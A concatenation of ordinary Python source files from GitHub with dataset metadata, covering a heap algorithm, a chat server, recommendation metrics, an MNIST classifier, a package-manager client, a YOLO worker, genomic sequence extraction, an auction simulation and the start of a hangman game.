]:\n largest = r\n if largest != i:\n arr[ largest ], arr[ i ] = arr[ i ], arr[ largest ]\n self.sift_down( arr, n, largest )\n \n def sift_up( self, arr, n, i ):\n if i == 0:\n return\n par = ( i - 1 ) // 2\n \n if( arr[ par ] < arr[ i ] ):\n arr[ par ], arr[ i ] = arr[ i ], arr[ par ]\n self.sift_up( arr, n, par )\n \n \n def findKthLargest(self, nums, k):\n # max-heap of negated values: heap[ 0 ] holds the negation of the k-th largest seen so far\n heap = []\n for i in range( len( nums ) ):\n if len( heap ) < k:\n heap.append( -nums[ i ] )\n self.sift_up( heap, len( heap ), len( heap ) - 1 )\n elif -nums[ i ] <= heap[ 0 ]:\n # nums[ i ] beats the current k-th largest: replace the root and restore the heap\n heap[ 0 ] = -nums[ i ]\n self.sift_down( heap, len( heap ), 0 )\n \n return heap[ 0 ] * -1\n\na = Solution()\n\nprint( a.findKthLargest( [ 3,2,1,5,6,4 ], 2 ) )\n","repo_name":"YingjingLu/Cai-Ji","sub_path":"top_k.py","file_name":"top_k.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72128262614","text":"import socket\nimport threading\n# Connection Data\nhost = '127.0.0.1'\nport = 55554\n\n# Starting Server\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind((host, port))\nserver.listen()\n\n# Lists For Clients and Their Nicknames\nclients = []\nnicknames = []\n\n# Sending Messages To All Connected Clients\n\n\ndef broadcast(message):\n\n for client in clients:\n client.send(message)\n\n# Handling private messages From Clients\n\n\ndef private(nick, user, message):\n text = '{} says: {}'.format(nick, message).encode('ascii')\n index2 = nicknames.index(nick)\n try:\n index = nicknames.index(user)\n for client in clients:\n print(client)\n if client == clients[index]:\n client.send(text)\n except:\n clients[index2].send(\n (\"Something went wrong. 
There might not be a user with that name\").encode('ascii'))\n\n# Checking the user feed and acting accordingly\n\n\ndef handle(client):\n while True:\n try:\n message = client.recv(1024).decode('ascii')\n text = message.split(\":\")\n if text[1] == \"private\" or text[1] == \"Private\":\n # send a private message\n private(text[0], text[2], text[3])\n else:\n # if not private message send to all\n broadcast(message.encode('ascii'))\n except:\n # Removing And Closing Clients\n print(\"Error has occurred\")\n index = clients.index(client)\n print(index)\n clients.remove(client)\n client.close()\n nickname = nicknames[index]\n broadcast('{} left!'.format(nickname).encode('ascii'))\n nicknames.remove(nickname)\n break\n\n\n# Receiving / Listening Function\ndef receive():\n while True:\n # Accept Connection\n client, address = server.accept()\n print(\"Connected with {}\".format(str(address)))\n\n # Request And Store Nickname\n client.send('NICK'.encode('ascii'))\n nickname = client.recv(1024).decode('ascii')\n nicknames.append(nickname)\n clients.append(client)\n\n # Print And Broadcast Nickname\n print(\"Nickname is {}\".format(nickname))\n broadcast(\"{} joined!\".format(nickname).encode('ascii'))\n client.send('Connected to server!'.encode('ascii'))\n\n # Start Handling Thread For Client\n thread = threading.Thread(target=handle, args=(client,))\n thread.start()\n\n\nreceive()\n","repo_name":"EvilMoonBerry/chat","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73169718933","text":"\"\"\"\nFunctions related to recommendation; mostly (entirely?) scoring metrics\nAuthor: Victor Veitch\n\"\"\"\n\nimport numpy as np\n\n\ndef nDCG(users, ranks, test, p=np.inf):\n \"\"\"\n Computes the normalized Discounted Cumulative Gain at rank p\n\n Note: currently only handles simple graphs\n Note: if this turns out to be slow, can be sped up w smarter data structure and searchsorted in same way as pq-samp gen\n\n :param users: np.array of labels of users to score recommendations\n :param ranks: np.array of [users, recommendations]; ith row corresponds to user[i]\n :param test: edge list of true values to score against\n :param p: int\n :return:\n \"\"\"\n\n # restrict rankings to the top p\n rel_ranks = ranks[:, 0:min(p, ranks.shape[1])]\n\n nDCG = np.zeros(users.shape[0])\n for en, user in enumerate(users):\n user_test = test[test[:, 0] == user]\n test_ranks = np.isin(rel_ranks[en, :], user_test[:, 1]).nonzero()[0] + 1\n DCG = np.sum(np.log(2.) / (np.log(test_ranks + 1)))\n\n num_rel = min(p, user_test.shape[0]) # number of relevant\n itest_ranks = np.array(range(num_rel)) + 1\n iDCG = np.sum(np.log(2.) 
/ (np.log(itest_ranks + 1)))\n if iDCG == 0:\n nDCG[en] = -13 # this is to avoid a divide-by-0 runtime error\n else:\n nDCG[en] = DCG / iDCG\n # if np.isnan(nDCG[en]):\n # happens if user has not rated any test items\n # (this is possible under pq sampling if all test ratings for the user are for items not included in train)\n # pass\n\n return nDCG[nDCG != -13]\n\n\ndef precision_at_m(users, ranks, test, m):\n precision = np.zeros(users.shape[0])\n for en, user in enumerate(users):\n user_test = test[test[:, 0] == user]\n denominator = np.minimum(m, user_test[:, 1].shape[0])\n numerator = np.sum(np.isin(ranks[en, 0:m], user_test[:, 1])).astype(float)\n if denominator == 0:\n precision[en] = -13\n else:\n precision[en] = numerator / denominator\n\n return precision[precision != -13]\n\n\ndef score_recommendations(rankings, test_users, test, p=1000, m=20, batch_size=500):\n \"\"\"\n\n :param rankings: matrix of shape [test_users, num_rankings] where rankings[i,:] is ordered list of items in test\n :param test_users: test_users[i] is the label of the user represented in the ith row of the ranking matrix\n :param test: graph of test set, in (edge_list, weights) format\n :param p: as in NDCG@p\n :param m: as in precision@m\n :param batch_size: number of users to process per batch\n :return:\n \"\"\"\n\n el, weights = test\n\n # batch up the users (to avoid memory problems... not clear how much this really matters)\n num_users = test_users.shape[0]\n num_splits = np.ceil(num_users / batch_size).astype(int)\n test_user_splits = np.array_split(test_users, num_splits)\n ranking_splits = np.array_split(rankings, num_splits)\n\n agg_ndcg_scores = []\n agg_precision_scores = []\n\n for split_idx in range(num_splits):\n test_users_sp = test_user_splits[split_idx]\n test_ranks_sp = ranking_splits[split_idx]\n\n agg_ndcg_scores += [nDCG(test_users_sp, test_ranks_sp, el, p=p)]\n agg_precision_scores += [precision_at_m(test_users_sp, test_ranks_sp, el, m=m)]\n\n ndcg_scores = np.concatenate(agg_ndcg_scores)\n precision_scores = np.concatenate(agg_precision_scores)\n\n return ndcg_scores, precision_scores","repo_name":"ekanshs/data-splitting","sub_path":"helpers/recommend.py","file_name":"recommend.py","file_ext":"py","file_size_in_byte":3448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15206840619","text":"import RPi.GPIO as GPIO\nimport MFRC522\nimport signal\n\ncontinue_reading = True\n\n\n# function to read the uid and convert it to a string\n\ndef uidToString(uid):\n mystring = \"\"\n for i in uid:\n mystring = format(i, '02X') + mystring\n return mystring\n\n\n# Capture SIGINT for cleanup when the script is aborted\ndef end_read(signal, frame):\n global continue_reading\n print(\"Ctrl+C captured, ending read.\")\n continue_reading = False\n GPIO.cleanup()\n\n# Hook the SIGINT\nsignal.signal(signal.SIGINT, end_read)\n\n# Create an object of the class MFRC522\nMIFAREReader = MFRC522.MFRC522()\n\n# Welcome message\nprint(\"Welcome to the MFRC522 data read example\")\nprint(\"Press Ctrl-C to stop.\")\n\n# This loop keeps checking for chips.\n# If one is near it will get the UID and authenticate\nwhile continue_reading:\n\n # Scan for cards\n (status, TagType) = MIFAREReader.MFRC522_Request(MIFAREReader.PICC_REQIDL)\n\n # If a card is found\n if status == MIFAREReader.MI_OK:\n print (\"Card detected\")\n\n # Get the UID of the card\n (status, uid) = MIFAREReader.MFRC522_SelectTagSN()\n # If we have the UID, continue\n if status == 
MIFAREReader.MI_OK:\n print(\"Card read UID: %s\" % uidToString(uid))\n else:\n print(\"Authentication error\")\n\n","repo_name":"ianp1/ldap-config","sub_path":"masterterminal/MFRC522-python/Read.py","file_name":"Read.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"25644444261","text":"# Dependencies for our CNN \nimport tensorflow as tf\nimport numpy as np\n# Load in the MNIST dataset\n(X_train, y_train), (X_test, y_test) = tf.keras.datasets.mnist.load_data()\n\n# Reshape our data into 4 dimensions because the CNN requires it\nX_train = X_train.reshape(X_train.shape[0], 28, 28, 1).astype('float32')\nX_test = X_test.reshape(X_test.shape[0], 28, 28, 1).astype('float32')\n# Normalize our values from [0, 255] to [0, 1]\nX_train = X_train / 255\nX_test = X_test / 255\n# This converts the class vectors to binary matrices. This means that for class 1 which would represent the number '1', it would be represented as [0, 1, 0, 0, 0, 0, 0, 0, 0, 0]\ny_train = tf.keras.utils.to_categorical(y_train)\ny_test = tf.keras.utils.to_categorical(y_test)\nnum_classes = y_test.shape[1]\n\n# Define our model\nmodel = tf.keras.models.Sequential()\n\n#First convolution and maxpooling layer\nmodel.add(tf.keras.layers.Conv2D(32, (3, 3), input_shape=(28, 28, 1), activation='relu'))\nmodel.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))\n\n#Second convolution and maxpooling layer\nmodel.add(tf.keras.layers.Conv2D(64, (3, 3), activation='relu'))\nmodel.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))\n\n# Dropout layer to help convergence :)\nmodel.add(tf.keras.layers.Dropout(0.25))\n# Flatten our multi dimensional matrix to 1-D to be inputted into the DNN\nmodel.add(tf.keras.layers.Flatten())\n# Define the layers and nodes for the DNN\nmodel.add(tf.keras.layers.Dense(512, activation='relu'))\nmodel.add(tf.keras.layers.Dropout(rate=0.5)) \n# Define the output layer\nmodel.add(tf.keras.layers.Dense(10, activation='softmax'))\n\n# Define the loss, optimizer and metrics for the model\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n# Trains our model for 10 epochs\nmodel.fit(X_train, y_train, epochs=10, shuffle=True)\nmodel.save(\"digit_recognition.model\")\n# The model had 99.2% accuracy so I got super lucky with my training\n","repo_name":"GovindN75/Number-Predictor","sub_path":"Number Predictor/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39658598987","text":"# desc: a class to parse the command received\n# args: message - the received message\n# retn: a named tuple containing the parsed data\nclass ParseMessage:\n def __init__(self, message):\n # get the arguments in the message\n self.args = message.content.upper().split()\n # get the command after the command prefix\n self.command = self.args.pop(0)[1:]\n\n # initialize the params with default values\n self.game = 'NONE'\n self.name = 'NONE'\n self.wins = 'NONE'\n self.sort = 'NONE'\n self.losses = 'NONE'\n self.winner = 'NONE'\n self.losers = 'NONE'\n self.nonKeyed = 'NONE'\n\n # iterate through each argument\n for arg in self.args:\n # split the argument into its parameters\n try:\n key, value = arg.split('=')\n except ValueError:\n key = 'NONE'\n value = arg\n\n # set the command params\n if key == 'GAME':\n self.game = value\n elif key == 'NAME':\n self.name = value\n 
elif key == 'WINS':\n self.wins = value\n elif key == 'SORT':\n self.sort = value\n elif key == 'LOSSES':\n self.losses = value\n elif key == 'WINNER':\n self.winner = value\n elif key == 'LOSERS':\n self.losers = value.split(',')\n elif key == 'NONE':\n self.nonKeyed = value\n","repo_name":"qwertyboy/gamebot","sub_path":"cmdparser.py","file_name":"cmdparser.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7081547812","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\nn = int(input())\nl = list(map(int, (input().split())))\nl.sort()\ntotal = 0\nmax_count = 1\nmode = l[0]\ncur_count = 1\nfor i in l:\n total += i\nmean = total / n\n\nif n % 2 == 1:\n median = l[n//2]\nelse:\n median = (l[n//2 - 1] + l[n//2]) / 2\n \nfor i in range(n-1):\n if l[i] == l[i+1]:\n cur_count += 1\n else:\n cur_count = 1\n if cur_count > max_count:\n max_count = cur_count\n mode = l[i+1]\n \n \n\nprint(mean)\nprint(median)\nprint(mode)","repo_name":"ngtuetam/dsa-notes","sub_path":"math-statistic/mean_med_mode.py","file_name":"mean_med_mode.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1940739777","text":"from prettytable import PrettyTable, MSWORD_FRIENDLY\nfrom .printing import err, success\nfrom appdirs import user_data_dir\nfrom getpass import getpass\nfrom shutil import rmtree\nfrom pathlib import Path\nimport requests\nimport tarfile\nimport json\nimport os\nimport re\n\nTOK_PATH = Path(user_data_dir('pckp', 'sertdfyguhi'))\nTOK_PATH.mkdir(exist_ok=True, parents=True)\n\ndef set_token(tok):\n with open((TOK_PATH / 'token.txt'), 'w') as f:\n f.write(tok)\n f.close()\n\ndef get_token():\n if not os.path.exists((TOK_PATH / 'token.txt')):\n err('You are not logged in.')\n with open((TOK_PATH / 'token.txt'), 'r') as f:\n return f.read()\n\ndef install(package, url, message=True):\n req = requests.get(url.format(package))\n\n if req.status_code != 200:\n err(req.json()['message'])\n \n pkg_name = package\n if '-' in package:\n pkg_name = package.split('-')[0]\n\n filename = re.findall('filename=\"(.+)\"', req.headers['content-disposition'])[0].replace('.tar', '')\n path = Path(f'libraries/{pkg_name}')\n\n if os.path.exists(path):\n rmtree(path)\n os.mkdir(path)\n\n try:\n path.mkdir(exist_ok=True)\n except FileNotFoundError:\n err('libraries folder not found in current working directory.')\n\n with open((path / 'package.tar'), 'wb') as f:\n f.write(req.content)\n\n with tarfile.open((path / 'package.tar'), 'r') as tar:\n tar.extractall(f'libraries/{pkg_name}')\n\n os.remove((path / 'package.tar'))\n\n with open((path / 'pckp.json'), 'r') as f:\n c_json = json.loads(f.read())\n\n if 'dependencies' in c_json:\n for dep_pkg in c_json['dependencies']:\n install(f\"{dep_pkg}-{c_json['dependencies'][dep_pkg]}\", url, False)\n\n if message:\n if not os.path.exists('pckp.json'):\n with open('pckp.json', 'w') as f:\n f.write('{}')\n f.close()\n\n with open('pckp.json', 'r+') as f:\n try:\n c_json = json.loads(f.read())\n except json.JSONDecodeError:\n err('Invalid JSON in pckp.json')\n\n f.seek(0)\n\n try:\n c_json['dependencies'] = {\n **c_json['dependencies'],\n **{ pkg_name: filename.split('-')[1] }\n }\n except KeyError:\n c_json['dependencies'] = { pkg_name: filename.split('-')[1] }\n\n f.write(json.dumps(c_json, sort_keys=False, indent=2))\n f.close()\n\n if 
message:\n success(f\"{filename} installed successfully.\")\n\ndef uninstall(package):\n if os.path.exists(f'libraries/{package}'):\n rmtree(f'libraries/{package}')\n else:\n err(f'{package} is not installed.')\n\n if os.path.exists('pckp.json'):\n with open('pckp.json', 'r+') as f:\n try:\n c_json = json.loads(f.read())\n except json.JSONDecodeError:\n err('Invalid JSON in pckp.json')\n\n f.seek(0)\n\n del c_json['dependencies'][package]\n\n f.write(json.dumps(c_json, sort_keys=False, indent=2))\n f.close()\n else:\n with open('pckp.json', 'w') as f:\n f.write(json.dumps({ \"dependencies\": {} }, sort_keys=False, indent=2))\n f.close()\n\n success(f'{package} successfully uninstalled.')\n\ndef register(url):\n data = {\n \"user\": input('username: '),\n \"pass\": getpass('password: ')\n }\n\n req = requests.post(url, json=data)\n\n if req.status_code != 200:\n err(req.json()['message'])\n\n res = req.json()\n set_token(res['token'])\n success(res['message'])\n\ndef publish(json, url):\n files = { f: open(f, 'r').read() for f in os.listdir() if os.path.isfile(f) }\n json['data'] = files\n json['token'] = get_token()\n\n if 'long_desc' in json and os.path.exists(json['long_desc']):\n json['long_desc'] = open(json['long_desc'], 'r').read()\n\n req = requests.post(url, json=json)\n res = req.json()\n if req.status_code != 200:\n err(res['message'])\n\n success(res['message'])\n\ndef search(package, url):\n req = requests.get(url, { 'q': package })\n res = req.json()\n\n if req.status_code != 200:\n err(res['message'])\n\n table = PrettyTable([ 'Name', 'Version', 'Author' ])\n for rating in res:\n table.add_row(rating.values())\n table.set_style(MSWORD_FRIENDLY)\n print(table)\n","repo_name":"litecave/pckp","sub_path":"cli/helper/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4434,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"71684457173","text":"from utilz.kafka_utils import create_consumer, create_producer\nfrom utilz.misc import custom_serializer, resource_exists, log, create_lock\nfrom PIL import Image\nfrom numpy import asarray\nimport io, torch, socket, os, logging\n\ndef run():\n\n # DYNAMIC ARGUMENTS FOR YOLO PROCESSING\n args = {\n 'model': os.environ.get('YOLO_MODEL', 'custom-750k'),\n 'validate_results': True if os.environ.get('VALIDATE_RESULTS', 'TRUE') == 'TRUE' else False,\n 'kafka_input': 'yolo_input',\n 'kafka_output': 'yolo_output',\n }\n\n # CREATE A PERMANENT LOGFILE\n logging.basicConfig(filename='yolo_logs.log', encoding='utf-8', level=logging.DEBUG)\n\n ########################################################################################\n ########################################################################################\n\n # MAKE SURE THE MODEL FILE EXISTS\n if not resource_exists(f'./models/{args[\"model\"]}.pt'):\n return\n\n # CREATE KAFKA CLIENTS\n kafka_consumer = create_consumer(args['kafka_input'])\n kafka_producer = create_producer()\n\n # MAKE SURE KAFKA CONNECTIONS ARE OK\n if not kafka_producer.connected() or not kafka_consumer.connected():\n return\n\n # LOAD THE INTENDED YOLO MODEL\n yolo_model = torch.hub.load('ultralytics/yolov5', 'custom', path=f'./models/{args[\"model\"]}.pt', trust_repo=True, force_reload=True)\n device = yolo_model.parameters().__next__().device\n log(f'LOADED MODEL ({args[\"model\"]}) ON DEVICE ({device})')\n\n # TRACK WHICH MACHINE (POD) IS DOING THE PROCESSING\n hostname = socket.gethostname()\n ip_addr = 
socket.gethostbyname(hostname)\n\n # CONSUMER THREAD STUFF\n thread_lock = create_lock()\n\n ########################################################################################\n ########################################################################################\n\n # WHAT THE THREAD DOES WITH POLLED EVENTS\n def process_event(img_bytes, nth_thread):\n\n # CONVERT INPUT BYTES TO IMAGE & GIVE IT THREAD SPECIFIC YOLO MODEL\n img = Image.open(io.BytesIO(img_bytes))\n results = yolo_model.forward(asarray(img))\n\n # PUSH RESULTS INTO VALIDATION TOPIC\n if args['validate_results']:\n kafka_producer.push_msg(args['kafka_output'], custom_serializer({\n 'timestamps': {\n 'pre': results.t[0],\n 'inf': results.t[1],\n 'post': results.t[2],\n },\n 'source': ip_addr,\n 'model': args['model'],\n 'dimensions': results.s\n }))\n\n ########################################################################################\n ########################################################################################\n\n # CREATE & START WORKER THREADS\n try:\n kafka_consumer.poll_next(1, thread_lock, process_event)\n\n # TERMINATE MAIN PROCESS AND KILL HELPER THREADS\n except KeyboardInterrupt:\n thread_lock.kill()\n log('WORKER MANUALLY KILLED..', True)\n\nrun()","repo_name":"wickstjo/aalto-ensure","sub_path":"yolo/app/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4684297681","text":"import os\r\nimport sys\r\nimport subprocess\r\n\r\n\r\ndef get_chr_file_dict(chr_directory, target_chromo_list):\r\n listdir = os.listdir(chr_directory)\r\n listdir = [f for f in listdir if '.fa' in f and not f.endswith('.fai')]\r\n chromo_file_dict = {}\r\n for chr_file in listdir:\r\n chr_file = os.path.join(chr_directory, chr_file)\r\n if chr_file.endswith('.gz'):\r\n gunzip_cmp = ('gunzip', chr_file)\r\n res0 = subprocess.Popen(gunzip_cmp)\r\n res0.wait()\r\n chr_file = chr_file.rsplit('.', 1)[0]\r\n if res0.returncode != 0:\r\n exit(1)\r\n\r\n with open(chr_file) as f:\r\n for line in f:\r\n if line.startswith('>'):\r\n chromo = line.strip().split()[0][1:]\r\n if chromo in target_chromo_list:\r\n chromo_file_dict[chromo] = chr_file\r\n return chromo_file_dict\r\n\r\n\r\ndef make_windows(df, temp_dir, step, output_file):\r\n # bedtools makewindows will lose information on strand\r\n # split df by strand\r\n # gtf is 1 based, bed is 0-based\r\n df['end'] += 1\r\n for strand in ['+', '-']:\r\n tmp_file = temp_dir + '.target.strand%s.bed' % strand\r\n df[df['strand'] == strand][['seqname', 'start', 'end']].sort_values(['seqname', 'start', 'end']).to_csv(\r\n tmp_file, sep='\\t', header=False, index=False)\r\n bedtools_merge = ('bedtools', 'merge', '-i', tmp_file)\r\n bedtools_cmd = ('bedtools', 'makewindows', '-b', '-', '-w', '13', '-s', str(step))\r\n awk_cmd = (\"awk\", \"{print $0\" + '\"\\t\"$1\"_' + strand + '_\"$2 \"\\t0\\t' + strand + '\"}')\r\n res0 = subprocess.Popen(bedtools_merge, stdout=subprocess.PIPE)\r\n res1 = subprocess.Popen(bedtools_cmd, stdin=res0.stdout, stdout=subprocess.PIPE)\r\n res2 = subprocess.Popen(awk_cmd, stdin=res1.stdout, stdout=open(output_file, 'a'))\r\n res2.wait()\r\n res1.wait()\r\n\r\n if res1.returncode == 0 and res2.returncode == 0:\r\n # clean up temp files\r\n os.remove(tmp_file)\r\n else:\r\n sys.exit(1)\r\n\r\n\r\ndef get_window_seq(chromo_dict, input_file, output_file):\r\n with open(input_file) as f:\r\n nb_cols = 
len(f.readline().split())\r\n if nb_cols == 0:\r\n os.rename(input_file, output_file)\r\n else:\r\n chromo_file = input_file + '.chromo'\r\n # gtf is 1-based and bed 0-based\r\n split_chromo = (\"awk\", ' $3 - $2 >= 13 {print $1 \"\\t\" $2 - 1 \"\\t\" $3 - 1 \"\\t\"$'\r\n + '\"\\t\"$'.join(str(i) for i in range (4, nb_cols + 1))\r\n + ' > ' + '\"' + chromo_file + '\"' + \"$1\" + \"}\", input_file)\r\n res0 = subprocess.Popen(split_chromo)\r\n res0.wait()\r\n if res0.returncode == 0:\r\n chromo_list = [f.replace(os.path.basename(input_file) + '.chromo', '') for f in os.listdir(os.path.dirname(chromo_file))\r\n if os.path.basename(input_file) + '.chromo' in f]\r\n os.remove(input_file)\r\n for chromo in chromo_list:\r\n chr_fasta = chromo_dict[chromo]\r\n getfasta_cmd = ('bedtools', 'getfasta', '-fi', chr_fasta, '-bed', chromo_file + chromo, '-bedOut', '-s')\r\n awk_cmd = ('awk', '{print $1 \"\\t\" $2 + 1 \"\\t\" $3 + 1 \"\\t\"$'\r\n + '\"\\t\"$'.join(str(i) for i in range (4, nb_cols + 2)) # +2 because we added sequence column\r\n + '}' )\r\n res1 = subprocess.Popen(getfasta_cmd, stdout=subprocess.PIPE)\r\n res2 = subprocess.Popen(awk_cmd, stdin=res1.stdout, stdout=open(output_file, 'a'))\r\n res2.wait()\r\n res1.wait()\r\n if res1.returncode == 0 and res2.returncode == 0:\r\n # clean up temp files\r\n os.remove(chromo_file + chromo)\r\n else:\r\n sys.exit(1)\r\n else:\r\n sys.exit(1)\r\n\r\n\r\n\r\ndef get_seq_bedtools(dataf, chr_directory, verbose, temp_dir, step):\r\n if verbose:\r\n print('Extracting target sequence')\r\n\r\n dataf['seqname'] = dataf['seqname'].map(str)\r\n target_chr_list = set(dataf['seqname'].unique())\r\n\r\n # list the chromosomes contained in each file\r\n chromo_file_dict = get_chr_file_dict(chr_directory, target_chr_list)\r\n\r\n missing_chromo = target_chr_list - set(chromo_file_dict.keys())\r\n if len(missing_chromo) > 0:\r\n print('Missing chromosome(s) in fasta files:\\n%s\\nExiting.' 
%(', '.join(missing_chromo)), file=sys.stderr)\r\n sys.exit(1)\r\n\r\n window_file = temp_dir + '.targetwindows.bed'\r\n window_seq_file = temp_dir + '.targetwindows.seq.bed'\r\n make_windows(dataf, temp_dir, step, window_file)\r\n get_window_seq(chromo_file_dict, window_file, window_seq_file)\r\n return chromo_file_dict\r\n","repo_name":"scottgroup/snoGloBe","sub_path":"bin/fetch_sequence.py","file_name":"fetch_sequence.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"41324892660","text":"from behave import given, when, then\nfrom selenium.webdriver.common.by import By\nfrom time import sleep\n\n\n\n\nSEARCH_RESULT = (By.XPATH,'//span[@class =\"a-color-state a-text-bold\"]')\n# PRODUCT_PRICE = (By.XPATH, \"//div[@data-component-type='s-search-result']//a[.//span[@class='a-price']]\")\n\nPRODUCT_NAME = (By.CSS_SELECTOR, 'h2 span.a-text-normal')\nSEARCH_RESULTS = (By.CSS_SELECTOR, '[data-component-type=\"s-search-result\"]')\nPRODUCT_IMG = (By.CSS_SELECTOR, '.s-image[data-image-latency=\"s-product-image\"]')\n\n\n\n# @when('Click on the first product')\n# def click_first_product(context):\n#     context.driver.find_element(*PRODUCT_PRICE).click()\n#     sleep(2)\n\n\n@when('Select department by alias {dept}')\ndef select_dept(context, dept):\n context.app.header.select_dept(dept)\n\n\n@then('Verify search result is {expected_result}')\ndef verify_search_result(context, expected_result):\n actual_result = context.driver.find_element(*SEARCH_RESULT).text\n assert expected_result == actual_result, f'Error, expected {expected_result} did not match actual {actual_result}'\n # context.app.search_result_page.verify_search_result(expected_result)\n\n\n@then('Verify every product has a product name and an image')\ndef verify_products_name_img(context):\n all_products = context.driver.find_elements(*SEARCH_RESULTS)\n\n for product in all_products:\n product_name = product.find_element(*PRODUCT_NAME).text\n print(product_name)\n assert product_name, 'Product name not shown'\n product.find_element(*PRODUCT_IMG)\n\n@then('Verify {dept} department is selected')\ndef verify_dept_selected(context, dept):\n context.app.header.verity_dept_selected(dept)","repo_name":"Gheetha76/Internship_project","sub_path":"features/steps/test_pdt__img_name.py","file_name":"test_pdt__img_name.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33404303401","text":"import math\nimport random\nimport statistics as stats\n\ndef c(l):\n return random.choice(l)\n\ndef r(k, k2=None):\n if k2 is None:\n return c(range(k))\n else:\n return c(range(k, k2))\n\ndef rn(p):\n return sum([r(10)*(10**i) for i in range(p)])\n\n# initialize price as a random 4-digit number (redraw until it really has 4 digits, so the log below is safe)\np_0 = rn(4)\nwhile p_0 < 1000:\n p_0 = rn(4)\n# tick size is 10**floor(log10(p_0)) / 20, i.e. 50 for a 4-digit price\nts = int(10**math.floor(math.log(p_0,10))/20.0)\n\nn_prices = 25\npossible_prices = [p_0 + ts*i for i in range(n_prices)]\nextended_possible_prices = [p_0 + ts*i/2.0 for i in range(n_prices*2)]\n\norders = []\nwhile len(orders) < 20:\n b,a = c(possible_prices),c(possible_prices)\n if b > a:\n b, a = a, b\n if b != a:\n orders.append({\"bs\":r(1,11),\"b\":b,\"a\":a,\"as\":r(1,11)})\n\nprice_summaries = {p:{\"bs\":0,\"as\":0} for p in extended_possible_prices}\nfor o in orders:\n price_summaries[o[\"b\"]][\"bs\"] += o[\"bs\"]\n price_summaries[o[\"a\"]][\"as\"] += o[\"as\"]\n\n# print out the bid and ask sizes at 
prices that have them\nfor p in possible_prices:\n if price_summaries[p][\"bs\"] != 0 or price_summaries[p][\"as\"] != 0:\n print(price_summaries[p][\"bs\"],p,price_summaries[p][\"as\"])\nprint()\n\n# print out the total buyers and sellers for every price, along with the surplus (<- buyers - sellers)\nfor p_i in range(len(extended_possible_prices)):\n p = extended_possible_prices[p_i]\n b_t = sum([price_summaries[p_][\"bs\"] for p_ in extended_possible_prices[p_i:]]) # buyers at prices above or equal to p\n a_t = sum([price_summaries[p_][\"as\"] for p_ in extended_possible_prices[:p_i+1]]) # sellers at prices below or equal to p\n s = b_t - a_t\n price_summaries[p][\"b_t\"] = b_t\n price_summaries[p][\"a_t\"] = a_t\n price_summaries[p][\"s\"] = s\n print(p,b_t,a_t,s)\nprint()\n\nbest_surplus = float(\"inf\")\nbest_prices = []\nfor p in extended_possible_prices:\n s_ = price_summaries[p][\"s\"]\n if abs(s_) < abs(best_surplus):\n best_prices = [p]\n best_surplus = s_\n elif abs(s_) == abs(best_surplus):\n best_prices.append(p)\n\nprint(best_prices)\n\nif best_surplus == 0:\n market_price = stats.mean(best_prices)\nelif best_surplus > 0: # buying pressure\n market_price = max(best_prices)\nelse: # selling pressure\n market_price = min(best_prices)\n\nprint(market_price)\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Kuhron/programming","sub_path":"Auction.py","file_name":"Auction.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"11731799166","text":"import os\nimport random\n\nFILE_TO_READ = './archivos/data.txt'\nMAX_MISTAKES = 10\nWINNING_IMAGE_INDEX = 11\n\nALPHABET = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',\n 'I', 'J', 'K', 'L', 'M', 'N', 'Ñ', 'O',\n 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W',\n 'X', 'Y', 'Z']\n\n\ndef clearScreen():\n os.system(\"cls\" if os.name == \"nt\" else \"clear\")\n\n\ndef print_logo():\n print('''\n\n ╔═══════════════════════════════════════════════════════════╗\n ║ ║\n ║ █ █ █████ █ █ █████ █ █ █████ █ █ ║\n ║ █ █ █ █ ██ █ █ ██ ██ █ █ ██ █ ║\n ║ █████ █████ █ █ █ █████ █ █ █ █████ █ █ █ ║\n ║ █ █ █ █ █ ██ █ █ █ █ █ █ █ ██ ║\n ║ █ █ █ █ █ █ █████ █ █ █ █ █ █ ║\n ║ ║\n ╚═══════════════════════════════════════════════════════════╝\n''')\n\n\ndef get_images():\n die0 = '''\n\n\n\n\n\n\n\n\n\n\n\n\n\n'''\n die1 = '''\n\n\n\n\n\n\n\n _____________\n / /|\n /____________ / |\n | | /\n |_____________|/\n\n'''\n die2 = '''\n ╔\n ║\n ║\n ║\n ║\n ║\n ║\n __║__________\n / ║ /|\n /____________ / |\n | | /\n |_____________|/\n\n'''\n die3 = '''\n ╔═════╦ \n ║\n ║\n ║\n ║\n ║\n ║\n 